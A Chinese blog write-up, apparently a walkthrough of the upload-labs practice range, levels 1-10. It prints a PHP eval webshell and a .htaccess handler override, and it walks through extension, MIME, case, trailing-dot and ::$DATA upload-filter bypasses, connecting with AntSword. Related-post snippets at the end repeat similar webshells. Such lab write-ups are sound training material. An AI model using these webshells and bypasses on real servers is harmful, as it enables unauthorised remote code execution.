靶场 : upload-labs1-10

已于 2022-04-18 12:59:36 修改
阅读量1.6k 收藏
点赞数 1
分类专栏: 漏洞 文章标签: web安全
于 2022-04-18 12:43:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ad12456/article/details/124211211
版权

搭建

用phpstudy搭建的。搭建很简单,下载源码,放置在phpstudy的根目录下,在phpstudy中创建。
在这里插入图片描述在这里插入图片描述在这里插入图片描述

步骤

这里上传的文件内容是一句话木马:

<?php
    header("Constent-type:text/html:charset=1232");
    echo "<pre>";
    @eval($_POST['input']);
?>

pass-1

上传一个php文件试一试。传不上的,使用的白名单过滤的。我们考虑一下是什么原因传不上去? 是被校验了,那我们查看一下哪里校验的,先看看前端代码。
在这里插入图片描述检查了一下前端代码,发现了一个checkFile函数。在这里插入图片描述把检查函数删除掉试一下。上传一下,成功上传。这样我们可以把恶意代码上传到服务器上,去攻击在这里插入图片描述我们可以在php文件中写入一句话木马
在这里插入图片描述
用蚁剑去连接。要知道url地址,就把页面中的图片拖拽到搜索框中,就能得到,填入参数,测试连接,连接成功。

在这里插入图片描述连接成功在这里插入图片描述
另外,那个我们在浏览器中禁用javascript,也能使得检测函数失败。在浏览器中输入about:config,禁用javascript
在这里插入图片描述

pass-2

我们还是试一下,上传php文件在这里插入图片描述上传不了,还是查看一下前端代码,还是有检测函数,这次删掉还是不行。那说明在后端还是有检测。这样如何上传呢,看看后端源码,白名单,其中image/jpeg的 格式为 MIME的,我们是没有填写这个的,它是由浏览器自动生成的,那我们就可以去抓包修改。到达饶过的目的。MIME的字段为content-type
在这里插入图片描述抓一下包
找到对应的Content-Type,将application/octet-stream改为image/jpeg 或者image/png或者 image/gif在这里插入图片描述
上传成功在这里插入图片描述上传成功就行了,不用蚁剑连接了。

pass-3

继续试一试php文件
在这里插入图片描述这里直接就是黑名单,可以看出他的黑名单不全,那我们可以利用等价扩展名来利用。

等价扩展名:

扩展名等价扩展名
aspasa,cer ,cdx
aspxashx,asmx,ascx
phpphp2,php3,php4,php5,phps,phtml
jspjspx,jspf

那么我将我扩展名改掉。改成 php3
在这里插入图片描述
在这里插入图片描述连接生效,这里还把文件名用时间重命名了。在这里插入图片描述这里要复现成功,就要修改一个配置信息。
在conf文件夹中,找到httpd.conf,添加下面的信息

AddType application/x-httpd-php .php .phptml .php3 .php5
在这里插入图片描述这一关,我在phpstudy上没有复现成,我用的apache服务搭建的。复现成功。

pass-4

这里等价扩展名不能用了。都被禁用了,在这里插入图片描述他没有禁用图片文件的后缀名。我们是可以上传图片文件的。在这里插入图片描述

那我们可以将php文件的后名改为jpg。上传成功,那要怎样去利用呢?在这里插入图片描述
答:要用到Hypertext Access(超文本入口)

.htaccess文件是Apache服务器中的一个配置文件,他负责相关目录下的网页配置,通过它可以实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

我们利用它改变文件扩展名的功能,将我们上传的图片以php文件解析。.htaccess文件内容,将bug.jpg以php文件格式解析。

<FilesMatch “bug.jpg”>
SetHandler application/x-httpd-php
</FilesMatch>

上传图片。然后上传 .htaccess文件在这里插入图片描述这样他们在同一个目录下。那就试试蚁剑是否能连接上。
没有连上。 因为版本不对。php用5.3.4的。再配置httpd.conf,把AllowOverride 的后面none 改成all在这里插入图片描述

pass -5

这一关将.htaccess文件也禁止上传了,提示有一个readme.php文件。
还没做

pass-6

查看源码时,发现没有进行转换为小写,而且黑名单也没有对大写的拦截。那我们试一试大写后缀名的上传。
在这里插入图片描述
上传成功了,那么试一试蚁剑连接。在这里插入图片描述

pass-7

这里查看源码,没有首位去空格的函数了。那就利用它。我们抓包弄。改包
先浏览文件。
在这里插入图片描述再打开抓包工具(开启),之后点击上传。抓下包在这里插入图片描述

发现不成。在这里插入图片描述开始找问题,是php版本的问题要选个低版本的。php 5.2的版本就可以了上传成功。在这里插入图片描述
在这里插入图片描述

pass-8

这里就说一下了,这里看源码是没有去除文件名最后有的,利用它,还是抓包,修改上传的php的文件名,再后缀后加个点,就可以上传成功。(注意没成功可能是php版本不对,修改一下就行)。
在这里插入图片描述

上传成功后,若是靶场部署在Windows上,那么就会自动把点去除掉。蚁剑就可以连的。在这里插入图片描述

pass-9

这里源码中没有对文件后缀中 ::$DATA的去除。还是抓包,改后缀名。上传能成功。在这里插入图片描述

连接的时候把那个::$data删除,再连接。
在这里插入图片描述

pass-10

源码中 文件名的检查都有,那咋搞呢? 我们利用它检查的顺序啊。它先删除一个点,再删除一个空格,那我们抓包改后缀时,可以这样 **php. .**这样构造,经过检查后,就剩下 php. 就可以上传成功。在这里插入图片描述连接蚁剑:
在这里插入图片描述

这里总结一下pass-7到pass-10,都是利用源码中过滤不严谨来进行饶过,
其中有 后缀加空格饶过 后缀加点饶过 后缀加::$data饶过 有利用过滤顺序构造来饶过。

? Persevere?
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
upload-labs-master.zip
06-22
文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master
upload-labs 10-14关,操作步骤配截图
jzzer447的博客
04-15 2555
pass10 查看源码 使用burp抓包测试 发现可以使用 点空格点 来绕过黑名单 复制文件地址访问,执行phpinfo(); pass11 查看源码,采用了替换函数,将后缀名php替换成了空格,只替换一次,把中间的php替换为空格后,剩下的也正好组合成php 注意 不能双写为phpphp改成2.pphphp,测试成功。 pass12 分析代码后发现,上传路径是可控的。采用%00截断法,在url中%00...
文件上传漏洞靶场upload-labs学习(pass6-pass10
AFCC_的博客(Web_Dog)
03-06 3033
0X00 Pass6 第6关从后缀绕过的角度考察,源码为: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3"
upload-labs·文件上传(靶场攻略)
最新发布
duoba_an的博客
03-19 1792
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。文件上传漏洞成因: 具备上传文件功能的Web等应用,未对用户选择上传的文件进行校验,使得非法 用户可通过上传可执行脚本而获取应用的控制权限。
Upload LABS Pass-10
wangyuxiang946的博客
07-03 1万+
第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单 准备一个 10.pphphp 文件 , 内容为一句话木马 <?php eval($_POST[-7]);?> 上传 10.pphphp 文件 后端黑名单中包含 'php' , 会将php替换为空 , 但只替换一次 , 替换后的文件名10.php , 仍然可以正常使用 右键 复制图片链接地址 , 并使用菜刀链接 链接成功 ...
upload-labs靶场详解
人若有志,就不会在半坡停止。
11-07 1614
1.定义:是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。本质为Apache配置⽂件,提供 了针对⽬录改变配置的⽅法,在⼀个特定的⽂档⽬录中放置⼀个包含⼀个或多个指 令的⽂件,2.允许.htaccess⽂件使⽤,httpd.conf配置⽂件中AllowOverride参数设置为All。3.参数:type 表示可以被分多个子类的独立类别,subtype 表示细分后的每个类型。以作⽤于此⽬录及其所有⼦⽬录,管理相关⽬录下的⽹⻚配置。
upload-labs靶场
m0_62100902的博客
06-07 538
1 还是老样子,审查源码,寄,直接对文件头进行校验,那么之前的所有操作,不管是你改文件名也好,改路径也好,你的内容是不可能变的,所以之前的所以操作在这。2 观察之后的源码,取后缀名的流程为:去点,首尾去空,删除末尾的点,以末尾的点截取后缀名,后缀名大小写转换,去除末尾的字符串::$DATA,首尾去空。1 审查源码,ok,这里终于换成了白名单了,那么之前那些所有的操作在这里都挂掉了,因为之前的操作都是去对文件后缀名进行的操作,这里是白名单,无论如何。ps:每次上传成功的意思是上传并且6=phpinfo();
WEB渗透学习-upload-labs靶场
04-20
upload-labs为WEB渗透中文件上传漏洞专项练习靶场,内涵各种文件上传漏洞类型,采用关卡制,一共21关,由易到难,适合刚接触该漏洞的新手巩固练习
upload-labs-master【文件上传靶场
04-05
最新版文件上传靶场
文件上传漏洞练习靶场upload-labs
07-05
文件上传漏洞练习靶场upload-labs内有文件上传漏洞的各种类型绕过的例题,非常全面,对加深文件上传漏洞的理解、利用非常有帮助。
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
文件上传漏洞(一) upload-labs靶场练习
好好睡觉
03-18 5308
常见文件上传漏洞类型总结、upload-labs靶场
Upload-labs 1-21关 靶场通关攻略(全网最全最完整)
热门推荐
晚安這個未知的世界
03-21 6万+
Pass-1(前端验证) 因为是进行前端JS校验,因此可以直接在浏览器检查代码把checkFile()函数(即如下图红色框选中的函数)删了或者也可以把红色框改成true,并按回车,即可成功上传php文件 复制图片地址并用蚁剑进行连接 Pass-2(MIME验证) 分析代码,可以看到,后端PHP代码只对content-type进行了检查 使用bp抓包,修改上传的PHP的content-type为image/png Pass-3(黑名单验证,特殊后缀) 这题本人使用的是PHP5.2.17环境 分析代码
upload-labs靶场全通关
m0_51553670的博客
08-01 996
看到上面 第二个if和第三个if 的位置,先是将上传的文件移动到了新的位置之后再判断文件的是不是图片如果不是再删除移动的图片,逻辑上是不是有点不严谨了,说明这里就存在可以让我们绕过的地方,如果疯狂的上传和访问图片,就可能造成文件正在被访问不能删除,文件就可以暂时的保留了。(因为我这个靶场是用docker搭建的,存在着一些问题,于是我重新换了一个docker源重新搭建了一个靶场,这个版本的第15关就是原版的第14关)但是上传路径是可以控制的,可以使用%00进行截断。我们看到,他已经说了,网站存在包含漏洞。
手把手教你玩转upload-labs靶场(1--20关超详细保姆级)
weixin_52796034的博客
08-23 703
Upload-labs靶场是一个内容全面且开源的PHP文件上传漏洞训练场所。它以真实的文件上传漏洞场景为基础,为安全研究人员和开发人员提供了一个实践和学习的平台。靶场提供了多种不同类型的漏洞场景,涵盖了文件类型绕过、文件名绕过、MIME类型绕过、大小限制绕过等多个方面。每个场景都有详细的解题思路和说明,帮助用户深入理解漏洞的原理和利用方式。通过上传恶意文件,用户可以亲身体验漏洞的利用技巧,并学习如何防范这些漏洞。Upload-labs靶场不仅提供了实践性,还提供了防御机制的实践,帮助用户全面了解如何保护系统
文件上传漏洞靶场upload-labs学习(pass1-pass5)
AFCC_的博客(Web_Dog)
02-18 4547
0x00 upload-labs简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。在2019年11月添加新的pass-05后关卡总数为21关。
upload-labs 靶场练习
Knsec
04-21 3386
靶场简介 个人博客时光机 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 项目地址:https://github.com/c0ny1/upload-labs 本writeup所使用环境为作者所提供的 windows环境一键启动环境。 靶场环境 漏洞简介 文件上传漏洞是由于对上传的文件没有进行合理严格的过滤,导致攻击者上传的文件被服务端解析,导致恶意文件中所包含的恶
upload-labs靶场1-21通关
08-17
要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值